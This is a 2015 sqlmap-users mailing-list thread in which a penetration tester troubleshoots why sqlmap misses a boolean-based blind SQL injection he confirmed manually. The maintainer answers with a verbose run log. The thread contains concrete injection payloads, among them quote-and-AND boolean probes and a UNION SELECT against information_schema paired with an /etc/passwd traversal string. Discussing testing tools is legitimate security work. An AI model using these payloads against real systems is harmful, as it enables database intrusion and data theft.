I would say that you screwed something up. Can you please send that traffic
file I requested.
Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
invalid.
$ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
--dummy -v 3
_
___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 08:55:05
[08:55:05] [DEBUG] cleaning up configuration parameters
[08:55:05] [DEBUG] setting the HTTP timeout
[08:55:05] [DEBUG] creating HTTP requests opener object
[08:55:05] [DEBUG] heuristically checking if the target is protected by
some kind of WAF/IPS/IDS
[08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
[08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
[08:55:05] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
comparison on a sequence matcher. If no dynamic nor injectable parameters
are detected, or in case of junk results, refer to user's manual paragraph
'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
[08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
retry the request
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 2485
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
[08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 8682
[08:55:08] [INFO] GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
[08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
might not be injectable
[08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
[08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
[08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
[08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
[08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
[08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
[08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
[08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
[08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
[08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
[08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
[08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
[08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
...
On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com>
wrote:
> Hi Brandon,
>
> Thanks for your comment. Confirming that i've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec paramater with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, i assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But i would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> <bperry.volat...@gmail.com> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <
> miroslav.stam...@gmail.com>
> > wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which
> you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amcljohn...@gmail.com
> >
> > wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> <miroslav.stam...@gmail.com> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> > <amcljohn...@gmail.com>
> >> > wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests i've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
> response
> >> >> A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
> response
> >> >> B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, i'd
> be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >>
> >> >>
> ------------------------------------------------------------------------------
> >> >> One dashboard for servers and applications across
> >> >> Physical-Virtual-Cloud
> >> >> Widest out-of-the-box monitoring support with 50+ applications
> >> >> Performance metrics, stats and reports that give you Actionable
> >> >> Insights
> >> >> Deep dive visibility with transaction tracing using APM Insight.
> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >> >> _______________________________________________
> >> >> sqlmap-users mailing list
> >> >> sqlmap-users@lists.sourceforge.net
> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> ------------------------------------------------------------------------------
> > One dashboard for servers and applications across Physical-Virtual-Cloud
> > Widest out-of-the-box monitoring support with 50+ applications
> > Performance metrics, stats and reports that give you Actionable Insights
> > Deep dive visibility with transaction tracing using APM Insight.
> > http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> >
> > _______________________________________________
> > sqlmap-users mailing list
> > sqlmap-users@lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
